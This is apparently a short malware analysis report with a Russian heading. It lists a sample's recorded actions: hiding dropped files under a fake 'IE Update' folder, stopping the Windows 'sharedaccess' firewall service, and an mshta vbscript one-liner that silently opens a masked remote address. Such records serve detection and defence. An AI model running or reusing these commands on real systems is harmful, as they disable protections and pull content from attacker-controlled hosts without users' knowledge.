Техническая информация
- <SYSTEM32>\attrib.exe +r +h +s "%PROGRAM_FILES%\IE Update\oem.ini"
- <SYSTEM32>\attrib.exe +r +h +s "%PROGRAM_FILES%\IE Update\IEUpdate.ini"
- <SYSTEM32>\ping.exe 127.0.0.1 -n 180
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE http://cn##.sjt8.com/info.access/?st######
- <SYSTEM32>\net.exe stop sharedaccess
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\mshta.exe vbscript:createobject("wscript.shell").run("""iexplore""http://cn##.sjt8.com/info.access/?st######",0)(window.close)
- <LS_APPDATA>\oa.ini
- <LS_APPDATA>\oh.ini
- <LS_APPDATA>\exe1.ini
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\info[1]
- <LS_APPDATA>\exe2.ini
- <LS_APPDATA>\DllMain.txt
- %TEMP%\~1.bat
- <LS_APPDATA>\ComRes.txt
- <LS_APPDATA>\a.txt
- <LS_APPDATA>\oa.txt
- %TEMP%\~1.bat
- 'cn##.sjt8.com':80
- 'localhost':1037
- cn##.sjt8.com/info.access/?st######
- DNS ASK cn##.sjt8.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''